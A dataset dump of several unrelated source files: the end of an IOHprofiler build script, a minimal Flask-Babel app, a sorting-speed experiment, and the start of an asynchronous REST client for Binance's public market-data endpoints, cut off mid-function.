\"\"\"\n global RELEASE\n amalgamate(CORE_FILES + ['code-experiments/src/profiler/IOHprofiler_runtime_c.c'],\n 'code-experiments/build/c/IOHprofiler.c', RELEASE,\n {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n expand_file('code-experiments/src/profiler/IOHprofiler.h', 'code-experiments/build/c/profiler/IOHprofiler.h',\n {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n write_file(git_revision(), \"code-experiments/build/c/REVISION\")\n write_file(git_version(), \"code-experiments/build/c/VERSION\")\n if 11 < 3:\n python('code-experiments/build/c', ['make.py', 'clean'], verbose=_verbosity)\n python('code-experiments/build/c', ['make.py', 'all'], verbose=_verbosity)\n else:\n make(\"code-experiments/build/c\", \"clean\", verbose=_verbosity)\n make(\"code-experiments/build/c\", \"all\", verbose=_verbosity)\n\n\ndef run_c_example():\n \"\"\" Builds and runs the example experiment in C \"\"\"\n build_c()\n try:\n run('code-experiments/build/c', ['./example_experiment'], verbose=_verbosity)\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\ndef run_c():\n \"\"\" Builds and runs the example experiment in C \"\"\"\n build_c()\n try:\n run('code-experiments/build/c', ['./user_experiment'], verbose=_verbosity)\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\n\n################################################################################\n## Python 2\ndef _prep_python():\n global RELEASE\n amalgamate(CORE_FILES + ['code-experiments/src/IOHprofiler_runtime_c.c'],\n 
'code-experiments/build/python/cython/IOHprofiler.c',\n RELEASE, {\"IOHprofiler_VERSION\": git_version(pep440=True)})\n expand_file('code-experiments/src/IOHprofiler.h',\n 'code-experiments/build/python/cython/IOHprofiler.h',\n {'IOHprofiler_VERSION': git_version(pep440=True)})\n copy_file('code-experiments/build/python/README.md',\n 'code-experiments/build/python/README.txt')\n expand_file('code-experiments/build/python/setup.py.in',\n 'code-experiments/build/python/setup.py',\n {'IOHprofiler_VERSION': git_version(pep440=True)}) # hg_version()})\n # if 'darwin' in sys.platform: # a hack to force cythoning\n # run('code-experiments/build/python/cython', ['cython', 'interface.pyx'])\n\n\ndef build_python():\n _prep_python()\n ## Force distutils to use Cython\n # os.environ['USE_CYTHON'] = 'true'\n # python('code-experiments/build/python', ['setup.py', 'sdist'])\n # python(join('code-experiments', 'build', 'python'), ['setup.py', 'install', '--user'])\n python(join('code-experiments', 'build', 'python'), ['setup.py', 'install', '--user'])\n # os.environ.pop('USE_CYTHON')\n\n\ndef run_python_example():\n \"\"\" Builds and installs the Python module `IOHprofiler_python` and runs the\n `example_experiment.py` as a simple test case. \"\"\"\n build_python()\n try:\n python(os.path.join('code-experiments', 'build', 'python'),\n ['example_experiment.py'])\n except subprocess.CalledProcessError:\n sys.exit(-1)\n\ndef run_python():\n \"\"\" Builds and installs the Python module `IOHprofiler_python` and runs the\n `example_experiment.py` as a simple test case. \"\"\"\n build_python()\n try:\n python(os.path.join('code-experiments', 'build', 'python'),\n ['user_experiment.py'])\n except subprocess.CalledProcessError:\n print(\"error\")\n sys.exit(-1)\n\n\n################################################################################\n## Global\ndef build():\n builders = [\n build_c,\n build_python,\n ]\n for builder in builders:\n try:\n builder()\n except:\n failed = str(builder)\n print(\"============\")\n print(' ERROR: %s failed, call \"./do.py %s\" individually'\n % (failed, failed[failed.find('build_'):].split()[0]) +\n ' for a more detailed error report')\n print(\"============\")\n\n\ndef run_all():\n run_c()\n run_python()\n\n\n\ndef verbose(args):\n global _verbosity\n _verbosity = True\n main(args)\n _verbosity = False\n\ndef help():\n print(\"\"\"IOHprofiler framework bootstrap tool. 
Version %s\n\nUsage: do.py \n\n\nAvailable commands for users:\n\n build-c - Build C module\n build-python - Build Python modules\n\n run-c - Build and run example experiment in C\n run-python - Build and run example experiment in Python\n\nAvailable commands for developers:\n\n build - Build C and Python modules\n run - Run example experiments in C and Python\n\n\"\"\" % git_version(pep440=True))\n\n\ndef main(args):\n if len(args) < 1:\n help()\n sys.exit(0)\n cmd = args[0].replace('_', '-').lower()\n if cmd == 'build': build()\n elif cmd == 'run': run_all()\n elif cmd == 'build-c': build_c()\n elif cmd == 'build-python': build_python()\n elif cmd == 'run-c': run_c()\n elif cmd == 'run-c-example': run_c_example()\n elif cmd == 'run-python': run_python()\n elif cmd == 'run-python-example': run_python_example()\n else: help()\n\n\nif __name__ == '__main__':\n RELEASE = os.getenv('IOHprofiler_RELEASE', 'false') == 'true'\n main(sys.argv[1:])\n","repo_name":"qifanyyy/JupyterNotebook","sub_path":"new_algs/Sequence+algorithms/Selection+algorithm/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"29944434935","text":"#!/usr/bin/env python3\n\"\"\" This module is for a simple flask appth Babel \"\"\"\nfrom flask import (\n Flask,\n render_template,\n)\nfrom flask_babel import Babel\nfrom typing import Any\n\n\nclass Config(object):\n \"\"\" Configuration class for babel presets \"\"\"\n LANGUAGES = [\"en\", \"fr\"]\n BABEL_DEFAULT_LOCALE = \"en\"\n BABEL_DEFAULT_TIMEZONE = \"UTC\"\n\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\nbabel = Babel(app)\n\n\n@app.route('/', strict_slashes=False)\ndef home() -> Any:\n \"\"\" Home page of the application \"\"\"\n return render_template('1-index.html')\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=\"5000\")\n","repo_name":"Jesulayomy/alx-backend","sub_path":"0x02-i18n/1-app.py","file_name":"1-app.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19574552265","text":"import sys\nimport math\nimport string\nfrom sort_algos import merge_sort, selection_sort\n\n\ndef prepare_data(path):\n with open(path, encoding='utf-8') as f:\n data = f.read()\n\n trans_table = str.maketrans({key: None for key in string.punctuation})\n new_data = data.translate(trans_table)\n return new_data.split()\n\n\ndef main(a_or_b):\n words = prepare_data('the_adventures_of_sherlock_holmes.txt')\n # words = words[:10000]\n n = len(words)\n\n if a_or_b == 'a':\n print('The book contains {} words'.format(n))\n print('Sort algorithm A, O(n log n)')\n merge_sort(words)\n # print(words)\n else:\n print('----------------------------------------------------')\n print('Sort algorithm B, O(n**2)')\n selection_sort(words)\n print(words)\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n","repo_name":"hklb94/qualification-seminar-materials-2018","sub_path":"session-7/sorting_experiment.py","file_name":"sorting_experiment.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"3248369214","text":"#from mda.core.base.receivers.rest.connection import *\nimport numpy as np\nfrom itertools import count as sequence\n\nfrom time_funcs import dtHttp_to_dt64\n\n\n#print('reloading_conn')\n\n\n'''\nHTTP 4XX return codes are used for malformed requests; 
the issue is on the sender's side.\nHTTP 403 return code is used when the WAF Limit (Web Application Firewall) has been violated.\nHTTP 429 return code is used when breaking a request rate limit.\nHTTP 418 return code is used when an IP has been auto-banned for continuing to send requests after receiving 429 codes.\nHTTP 5XX return codes are used for internal errors; the issue is on Binance's side.\nWith using /wapi/v3 , HTTP 504 return code is used when the API successfully sent the message but not get a response within the timeout period. It is important to NOT treat this as a failure operation; the execution status is UNKNOWN and could have been a success.\n\n\n{\n \"code\":-1121,\n \"msg\":\"Invalid symbol.\"\n}\n\n\n'''\nimport pickle as pl\nimport inspect\nimport os.path\n\nfrom aiohttp import ClientSession\nfrom aiohttp.client_exceptions import ClientConnectorError\n#import ClientConnectorError\nimport time\nimport asyncio\n\nfrom copy import deepcopy\nfrom inspect import iscoroutinefunction\n\n# from mda.core.base.receivers.response_tps import *\t# OPEN, CLOSE, DATA, ERROR, SUCCESS, DECODE_ERROR\n\n\n'''\nasync def callback_example(result, id):\n\tpass\n'''\n\n\ndef connect_deco(method):\n\tasync def connect_wrapper(self, *args, **kwargs):\n\t\tif self.connected or self.closed:\n\t\t\traise Exception('method \"connect\" has already been used')\n\n\t\tawait method(self, *args, **kwargs)\n\n\t\tself.connected = True\n\n\t# await self.callback({'tp': 'open', 'data': None, 'tm': time.time()})\n\n\treturn connect_wrapper\n\n\ndef disconnect_deco(method):\n\tasync def disconnect_wrapper(self, *args, **kwargs):\n\t\tif self.closed:\n\t\t\traise Exception('connection already closed')\n\t\tself.closed = True\n\t\tawait method(self, *args, **kwargs)\n\n\t# await self.callback({'tp': 'close', 'data': None, 'tm': time.time()})\n\n\treturn disconnect_wrapper\n\n\ndef low_deco(method):\n\tdef wrapper(self, *args, **kwargs):\n\t\trequests_params = method(self, *args, **kwargs)\n\t\treturn self.req_low(requests_params)\n\n\treturn wrapper\n\n\nclass Connection_base():\n\tconnect_params = {}\n\n\tdef __init__(self, callback, do_not_return=None, auto_connect=False, connect_params=None):\n\t\t'''\n\t\tcallback:coroutine\n\t\tauto_connect:bool\t//True - calling the \"connect\" method is not required, at the start of requests, \"connect\" will be called automatically,\n\t\t\t\t\t//False - call \"connect\" is required\n\t\tauto_disconect\t\t//??\n\n\t\t'''\n\t\tself.id_sequence=sequence(1)\n\t\tself.closed = False\n\t\tself.active = False\n\t\tself.connected = False\n\t\tself.conn = None\n\t\tself.conn_coro = None\n\n\t\tself.callback = callback\n\t\tself.do_not_return = (\n\t\t\tdo_not_return if isinstance(do_not_return, list) else [do_not_return]) if do_not_return else []\n\t\tself.auto_connect = auto_connect\n\t\t# self.auto_disconect = auto_disconnect\n\n\t\tself.connect_params = deepcopy(self.connect_params)\n\t\tif connect_params:\n\t\t\tfor key, value in connect_params.items():\n\t\t\t\tself.connect_params[key] = value\n\n\t# {CONNECTION_CONTROL_INTERFACE}\n\n\t@connect_deco\n\tasync def connect(self, **connect_params):\n\t\traise NotImplementedError\n\n\t@disconnect_deco\n\tasync def disconnect(self):\n\t\traise NotImplementedError\n\n\tdef is_ready(self):\n\t\t'''\n\t\t1. whether the connection is ready for subscriptions\n\t\t'''\n\t\treturn self.is_connected() and not self.closed\n\n\tdef is_active(self):\n\t\t'''\n\t\t1. whether the connection is ready for subscriptions (a special case of is_ready); unlike is_ready it also shows that the connection is actually up and working\n\t\t'''\n\t\tif self.active:\n\t\t\treturn True\n\n\tdef is_connected(self):\n\t\t'''\n\t\t1. shows whether a call to connect is still needed\n\t\t'''\n\t\treturn self.connected or self.auto_connect\n\n\tdef is_closed(self):\n\t\t'''\n\t\t1. shows that the connection has not been dropped\n\t\t'''\n\t\treturn self.closed\n\n\t##{INTERNAL}\n\tdef get_url(self, **params):\n\t\treturn self.url\n\n\tdef decode(self, raw):\n\t\traise NotImplementedError\n\n\t# def parse(self, msg):\n\t# return self.parser.parse(msg)\n\n\t# async def handle(self, raw):\n\t#\ttry:\n\t#\t\tdecoded=self.decode(msg)\n\t#\texcept:\n\n\t# def handle(self, raw):\n\t#\tdecoded = self.decode(msg)\n\t# parsed = self.parsed(decoded)\n\t#\treturn parsed\n\n\t# def parse(self, msg):\n\t#\traise NotImplementedError\n\n\tdef generate_requests(self, requests_params):\n\t\traise NotImplementedError\n\n\tdef send_request(self, request):\n\t\traise NotImplementedError\n\n\t# await def run(self):\n\t#\traise NotImplementedError\n\n\t#\n\n\t# {REQUESTS_INTERFACE}\n\t##{LOW}\n\n\tdef req_low(self, requests_params, callback=None, timeout=None):\n\t\t'''\n\t\tcallback: func(msg, id) or None\n\t\t'''\n\t\tif self.closed:\n\t\t\traise Exception('the connection was closed')\n\t\tif not self.connected:\n\t\t\traise Exception('connection not yet open')\n\n\t\tfutures = None\n\n\t\tif isinstance(requests_params, list):\n\t\t\tout_is_list = True\n\t\telse:\n\t\t\tout_is_list = False\n\t\t\trequests_params = [requests_params]\n\n\t\ttrack_ids = [next(self.id_sequence) for i in range(len(requests_params))]\n\t\t#print(requests_params)\n\t\trequests = self.generate_requests(requests_params)\n\t\t\n\t\t#print(requests)\n\t\tif callback or self.callback:\n\t\t\tif callback:\n\t\t\t\tcallbacks = [self.get_tracked_callback(callback, track_id) for track_id in track_ids]\n\t\t\telse:\n\t\t\t\tcallbacks = [self.get_tracked_callback(self.callback, track_id) for track_id in track_ids]\n\t\t\n\t\telse:\n\t\t\tfutures = [asyncio.Future() for i in range(len(requests_params))]\n\t\t\tcallbacks = [future.set_result for future in futures]\n\n\t\tfor request, callback, track_id, request_params in zip(requests, callbacks, track_ids, requests_params):\n\t\t\tself.send_request(request, callback, track_id, request_params, timeout)\n\n\t\tif futures:\n\t\t\tif out_is_list:\n\t\t\t\treturn futures\n\t\t\telse:\n\t\t\t\treturn futures[0]\n\t\tif out_is_list:\n\t\t\treturn track_ids\n\t\telse:\n\t\t\treturn track_ids[0]\n\n\n\tdef get_tracked_callback(self, callback, track_id):\n\t\tdef callback_tracked(msg):\n\t\t\treturn callback(msg, track_id=track_id)\n\n\t\treturn callback_tracked\n\n\n\t##\n\t##{HIGH}\n\t@low_deco\n\tdef sub_trades_up(self, market_s, **params):\n\t\treturn self.get_requests_params('sub', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_orderbook_up(self, market_s, **params):\n\t\treturn self.get_requests_params('sub', 'deltas', True, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('sub', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('sub', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_orderbook(self, market_s, **params):\n\t\treturn self.get_requests_params('get', 'orderbook', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_trades(self, market_s, 
**params):\n\t\treturn self.get_requests_params('get', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_pong(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'pong', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_trades(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'trades', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_orderbook(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'orderbook', True, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_CHL(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_CHL', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_tickers_C(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'tickers_C', False, market_s, **params)\n\n\n\t@low_deco\n\tdef get_markets(self, market_s=None, **params):\n\t\treturn self.get_requests_params('get', 'markets', False, market_s, **params)\n\n\n\t@low_deco\n\tdef sub_ohlcv_up(self, market_s, **params):\n\t\treturn self.get_requests_params('get', 'ohlcv_up', True, market_s, **params)\n\n\t@low_deco\n\tdef get_ohlcv(self, market_s, **params):\n\t\t#print(params)\n\t\treturn self.get_requests_params('get', 'ohlcv', True, market_s, **params)\n\n\n\t###{INTERNAL}\n\tdef get_requests_params(self, req_tp, data_tp, market_required, market_s, **params):\n\t\tif not market_required:\n\t\t\tif not market_s:\n\t\t\t\trequest_info = {'req_tp': req_tp, 'data_tp': data_tp, **params}\n\t\t\t\treturn request_info\n\n\t\tif not isinstance(market_s, list):\n\t\t\tmarket_s = [market_s]\n\t\t# market_s = [self.market_to_exfrmt(market) for market in market_s]\n\n\t\trequests_params = []\n\t\tfor market in market_s:\n\t\t\trequest_info = {'req_tp': req_tp, 'data_tp': data_tp, 'market': market, **params}\n\t\t\trequests_params.append(request_info)\n\t\treturn requests_params\n\n\n\t###\n\t##\n\t#\n\n\n# from mda.core.base.receivers.response_tps import *\t# OPEN, CLOSE, DATA, ERROR, SUCCESS, DECODE_ERROR\n# from mda.core.base.receivers.rest.error_tps import * # NOT_CONNECTION, UNKNOWN, REQUESTS_TIMEOUT, INVALID_REQUEST, INVALID_MARKET\n\nclass SymbolParsingError(Exception):\n\tpass\n\nclass Connection_rest(Connection_base):\n\tconnect_params = {}\n\tsemaphore_value = 1000\n\t# session=None\n\tsemaphore = None\n\tfrom_request_to_request_params = {}\n\n\tincoming_msgs = [\n\t\t'data',\n\t\t'error',\n\t\t'decode_error'\n\n\t]\n\n\tdata_tps = [\n\t\t'orderbook',\n\t\t'trades',\n\t\t'tickers_C',\n\t\t'tickers_CHL',\n\t\t'markets',\n\t\t'ohlcv'\n\t]\n\n\terror_tps = [\n\t\t'network_down',\n\t\t'too_many_requests',\n\t\t'invalid_market',\n\t\t'service_unavailable',\n\t\t'repeat',\n\t\t'unknown_error'\n\t]\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args,**kwargs)\n\t\n\t\tself.get_tasks = {}\n\t\tself.basequote_map = {}\n\t\t#self.quotebase_map = {}\n\n\t\tself.on_incoming_msgs_methods = {msg_tp: getattr(self, 'parse_%s' % msg_tp) for msg_tp in self.incoming_msgs}\n\t\tself.on_data_methods = {data_tp: getattr(self, 'parse_data_%s' % data_tp) for data_tp in self.data_tps}\n\n\n\t\t#\n\t\tself.request_coros=set()\n\n\t# self.on_error_methods = {error_tp: 
getattr(self, 'parse_%s' % error_tp) for error_tp in self.error_tps}\n\n\t@connect_deco\n\tasync def connect(self, decode=True, parse=True, **connect_params):\n\t\t'''\n\n\t\t'''\n\t\tself.active = True\n\t\tself.semaphore = asyncio.Semaphore(self.semaphore_value)\n\t\tself.session = ClientSession(timeout=60, **connect_params)\n\t\t'''\n\t\tasync with ClientSession() as self.session:\n\t\t\tawait asyncio.sleep('always')\n\t\t'''\n\t\t\n\tdef connect_nowait(self, **connect_params):\n\t\tprint('connect')\n\t\tif self.connected or self.closed:\n\t\t\traise Exception('method \"connect\" has already been used')\n\t\tself.active = True\n\t\tself.semaphore = asyncio.Semaphore(self.semaphore_value)\n\t\tself.session = ClientSession(**connect_params)\n\t\tself.connected = True\n\t\t\n\n\t@disconnect_deco\n\tasync def disconnect(self, wait_for_responses=True):\n\n\t\tawait self.session.close()\n\n\t\twhile self.get_tasks:\n\t\t\tawait asyncio.sleep(0.1)\n\t\tself.active = False\n\t\t\n\tasync def close(self):\n\t\tawait self.disconnect()\n\n\tdef send_request(self, request, callback, track_id, request_params, timeout=None):\n\t\tcallback = self.set_task_removing_extension_to_callback(callback, track_id)\n\t\tget_task = asyncio.create_task(self.get(request, callback, timeout, request_params=request_params))\n\t\tself.get_tasks[track_id] = get_task\n\t\treturn get_task\n\n\tdef set_task_removing_extension_to_callback(self, callback, track_id):\n\t\tdef callback_extended(msg):\n\t\t\tself.get_tasks.pop(track_id)\n\t\t\treturn callback(msg)\n\n\t\treturn callback_extended\n\n\tasync def get(self, request, callback, timeout=None, **about_request):\n\t\tdefault_timeout=30\n\t\tasync with self.semaphore:\n\t\t\tresponse = None\n\t\t\ttry:\n\t\t\t\t#print('sending_request')\n\t\t\t\t#print(request)\n\t\t\t\treq_coro=asyncio.create_task(self.session.get(request, timeout=timeout or default_timeout))\n\t\t\t\tself.request_coros.add(req_coro)\n\t\t\t\tresponse = await asyncio.wait_for( req_coro, 30 )\n\t\t\t\tself.request_coros.remove(req_coro)\n\t\t\t\t#print('response recieved')\n\n\t\t\texcept asyncio.exceptions.TimeoutError as TimeoutError:\n\t\t\t\t#print('response failed')\n\t\t\t\tresult = {\n\t\t\t\t\t'msg_tp': 'error',\n\t\t\t\t\t'msg': TimeoutError,\n\t\t\t\t\t'status_code': -2,\n\t\t\t\t\t'request': request,\n\t\t\t\t\t**about_request,\n\t\t\t\t\t'tm': time.time()\n\t\t\t\t}\n\n\n\t\t\texcept ClientConnectorError as conn_error:\n\t\t\t\t#print('response failed')\n\t\t\t\t# self.E=E\n\t\t\t\tresult = {'msg_tp': 'error',\n\t\t\t\t\t\t 'msg': conn_error,\n\t\t\t\t\t\t 'status_code': 0,\n\t\t\t\t\t\t 'request': request,\n\t\t\t\t\t\t **about_request,\n\t\t\t\t\t\t 'tm': time.time()}\n\t\t\texcept Exception as E:\n\t\t\t\t#print('response failed')\n\t\t\t\tresult = {\n\t\t\t\t\t'msg_tp': 'error',\n\t\t\t\t\t'msg': E,\n\t\t\t\t\t'status_code': -1,\n\t\t\t\t\t'request': request,\n\t\t\t\t\t**about_request,\n\t\t\t\t\t'tm': time.time()\n\t\t\t\t}\n\t\t\tfinally:\n\t\t\t\tif response:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tresult = {\n\t\t\t\t\t\t\t'msg_tp': 'unknown',\n\t\t\t\t\t\t\t'msg': await response.json(),\n\t\t\t\t\t\t\t'headers': response.headers,\n\t\t\t\t\t\t\t'status_code': response.status,\n\t\t\t\t\t\t\t'request': request,\n\t\t\t\t\t\t\t** about_request,\n\t\t\t\t\t\t 'tm': time.time()\n\t\t\t\t\t\t}\n\t\t\t\t\texcept Exception as E:\n\t\t\t\t\t\tresult = {\n\t\t\t\t\t\t\t'msg_tp': 'unknown',\n\t\t\t\t\t\t\t'msg':E,\n\t\t\t\t\t\t\t'headers': response.headers,\n\t\t\t\t\t\t\t'status_code': 
response.status,\n\t\t\t\t\t\t\t'request': request,\n\t\t\t\t\t\t\t** about_request,\n\t\t\t\t\t\t\t'tm': time.time()\n\t\t\t\t\t\t}\n\t\t\t\t\tfinally:\n\t\t\t\t\t\tresponse.close()\n\n\t\t\t\tdecoded = self.decode(result)\n\t\t\t\tparsed = self.parse(decoded)\n\t\t\t\tcallback(parsed)\n\t\t\t# self.response=response\n\n\tdef generate_requests(self, requests_params):\n\t\treturn [self.generate_request(request_params) for request_params in requests_params]\n\n\tdef generate_request(self, request_params):\n\t\t#print(request_params)\n\t\t# self.requests_params_map[track_id]=request_params\n\n\t\treq_tp = request_params['req_tp']\n\t\tdata_tp = request_params['data_tp']\n\t\ttemplate_info = self.templates[data_tp][req_tp]\n\t\tinsert_params = []\n\t\t#print(request_params)\n\t\tfor param in template_info['order']:\n\t\t\tparam_value = request_params.get(param)\n\t\t\tif param_value is None:\n\t\t\t\tparam_value = template_info['default'][param]\n\t\t\telif param == 'market':\n\t\t\t\tparam_value = self.symbol_to_exfrmt(param_value)\n\t\t\tparam_value = template_info['apply'].get(param, lambda value: value)(param_value)\n\t\t\tinsert_params.append(param_value)\n\t\t#print(insert_params)\n\t\trequest = self.url + template_info['request_postfix'] % tuple(insert_params)\n\t\t#print(request)\n\t\treturn request\n\n\tdef decode(self, raw):\n\t\treturn raw\n\n\tdef parse(self, msg):\n\t\tparsed_msg = {}\n\t\ttry:\n\t\t\tmsg_tp = self.indentify_msg_tp(msg)\n\t\t\tparsed_msg = {\n\t\t\t\t'tp': msg_tp,\n\t\t\t\t**self.on_incoming_msgs_methods[msg_tp](msg),\n\t\t\t\t'tm': msg['tm']\n\t\t\t}\n\t\t\treturn parsed_msg\n\t\texcept Exception as E:\n\t\t\treturn self.return_parsing_error(msg, E)\n\n\tdef indentify_msg_tp(self, msg):\n\t\tif msg['msg_tp'] == 'unknown':\n\t\t\tif msg[\n\t\t\t\t'status_code'] == 200: # для окекса 200 может прийти если запршенна япара не сущеммствует или в запросе отсвуют требуеые параметры\n\t\t\t\tmsg_tp = 'data'\n\t\t\telse:\n\t\t\t\tmsg_tp = 'error'\n\t\t\treturn msg_tp\n\t\telse:\n\t\t\treturn msg['msg_tp']\n\n\tdef parse_data(self, msg):\n\t\tdata_tp = self.identify_data_tp(msg)\n\t\tparsed_data = {\n\t\t\t'data': self.on_data_methods[data_tp](msg)\n\t\t}\n\t\treturn parsed_data\n\n\tdef identify_data_tp(self, msg):\n\t\tdata_tp = msg['request_params']['data_tp']\n\t\treturn data_tp\n\n\tdef parse_data_orderbook(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_trades(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_tickers_CHL(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_tickers_C(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_markets(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_data_ohlcv(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_error(self, msg):\n\t\terror_tp = self.indentify_error_tp(msg)\n\t\tparsed_error = {\n\t\t\t'error_tp': error_tp,\n\t\t\t'msg': msg['msg'],\n\t\t\t'about_msg': {\n\t\t\t\t'headers': msg.get('headers'),\n\t\t\t\t'status_code': msg['status_code'],\n\t\t\t\t'request': msg['request']\n\t\t\t}\n\t\t}\n\t\treturn parsed_error\n\n\tdef indentify_error_tp(self, msg):\n\t\traise NotImplementedError\n\n\tdef parse_decode_error(self, msg):\n\t\tpass\n\n\tdef return_parsing_error(self, msg, E):\n\t\treturn {\n\t\t\t\n\t\t\t'tp': 'parsing_error',\n\t\t\t'exception': E,\n\t\t\t'unparsed': msg,\n\t\t\t'tm': msg['tm']\n\t\t}\n\n\tdef symbol_to_exfrmt(self, symbol):\n\t\tbase, quote = self.extract_basequote_infrmt(symbol)\n\t\tsymbol = self.join_basequote_exfrmt(base, 
quote)\n\t\treturn symbol\n\n\tdef symbol_to_infrmt(self, symbol):\n\t\t#print(symbol)\n\t\tbase, quote = self.extract_basequote_exfrmt(symbol)\n\t\tsymbol = self.join_basequote_infrmt(base, quote)\n\t\treturn symbol\n\n\tdef extract_basequote_infrmt(self, symbol):\n\t\tquote, base = symbol.split('-')\n\t\treturn base, quote\n\n\tdef extract_basequote_exfrmt(self, symbol):\n\t\tbasequote = self.basequote_map.get(symbol)\n\t\t#print(basequote)\n\t\tif not basequote:\n\t\t\traise SymbolParsingError()\n\t\tbase, quote = basequote\n\t\treturn base, quote\n\n\tdef join_basequote_infrmt(self, base, quote):\n\t\treturn f'{quote}-{base}'\n\n\tdef pass_basequote_map(self, basequote_map):\n\t\tself.basequote_map.update(basequote_map)\n\n\tdef update_basequote_map(self, exfrmt, base, quote):\n\t\tself.basequote_map.update({exfrmt: (base.upper(), quote.upper())})\n\nclass Connection(Connection_rest):\n\turl = 'https://api.binance.com'\n\n\ttemplates = {\n\t\t'markets': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/exchangeInfo',\n\t\t\t\t'order': [],\n\t\t\t\t'default': {},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\t\t'orderbook': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/depth?symbol=%s&limit=%s',\n\t\t\t\t'order': ['market', 'depth'],\n\t\t\t\t'default': {'depth': 1000},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\n\t\t'trades': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/trades?symbol=%s&limit=%s',\n\t\t\t\t# historicalTrades (for fetching older data) is not implemented for now, since it requires X-MBX-APIKEY\n\t\t\t\t'order': ['market', 'limit'],\n\t\t\t\t'default': {'limit': 1000},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {}\n\t\t\t}\n\t\t},\n\n\t\t'tickers_CHL': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/ticker/24hr%s',\n\t\t\t\t'order': ['market'],\n\t\t\t\t'default': {'market': ''},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {\n\t\t\t\t\t'market': lambda value: '?symbol=%s' % value if value else ''\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\n\t\t'tickers_C': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/ticker/price%s',\n\t\t\t\t'order': ['market'],\n\t\t\t\t'default': {'market': ''},\n\t\t\t\t'requared': [],\n\t\t\t\t'apply': {\n\t\t\t\t\t'market': lambda value: '?symbol=%s' % value if value else ''\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t'ohlcv': {\n\t\t\t'get': {\n\t\t\t\t'request_postfix': '/api/v3/uiKlines?symbol=%s&interval=%s&limit=%s%s%s',\n\t\t\t\t'order': ['market', 'interval', 'limit', 'start', 'end'],\n\t\t\t\t'default': {'interval': '1m', 'limit': 1000, 'start': None, 'end': None},\n\t\t\t\t'requared': ['market'],\n\t\t\t\t'apply': {\n\t\t\t\t\t\t'start': lambda value: '&startTime=%s' % value if value is not None else '',\n\t\t\t\t\t\t'end': lambda value: '&endTime=%s' % value if value is not None else ''\n\t\t\t\t }\n\t\t\t}\n\t\t}\n\t}\n\n\tmarket_activity_map = {'TRADING': True}\n\n\t# {symbols_converting}\n\n\tdef join_basequote_exfrmt(self, base, quote):\n\t\texfrmt = f'{base}{quote}'\n\t\tif not self.basequote_map.get(exfrmt):\n\t\t\tself.basequote_map[exfrmt] = (base, quote)\n\t\treturn exfrmt\n\n\n\n\t#\n\n\tdef parse_data_orderbook(self, msg):\n\t\ttm = dtHttp_to_dt64(msg['headers']['Date'])\n\t\treceived_at = np.datetime64(np.datetime64(int(msg['tm'] * 1000), 'ms'))\n\t\tmarket = msg['request_params']['market']\n\t\torderbook_raw = msg['msg']\n\t\tid = msg['msg'][\"lastUpdateId\"]\n\t\torderbook = {\n\t\t\t'id': id,\n\t\t\t'tm': tm,\n\t\t\t'bids': 
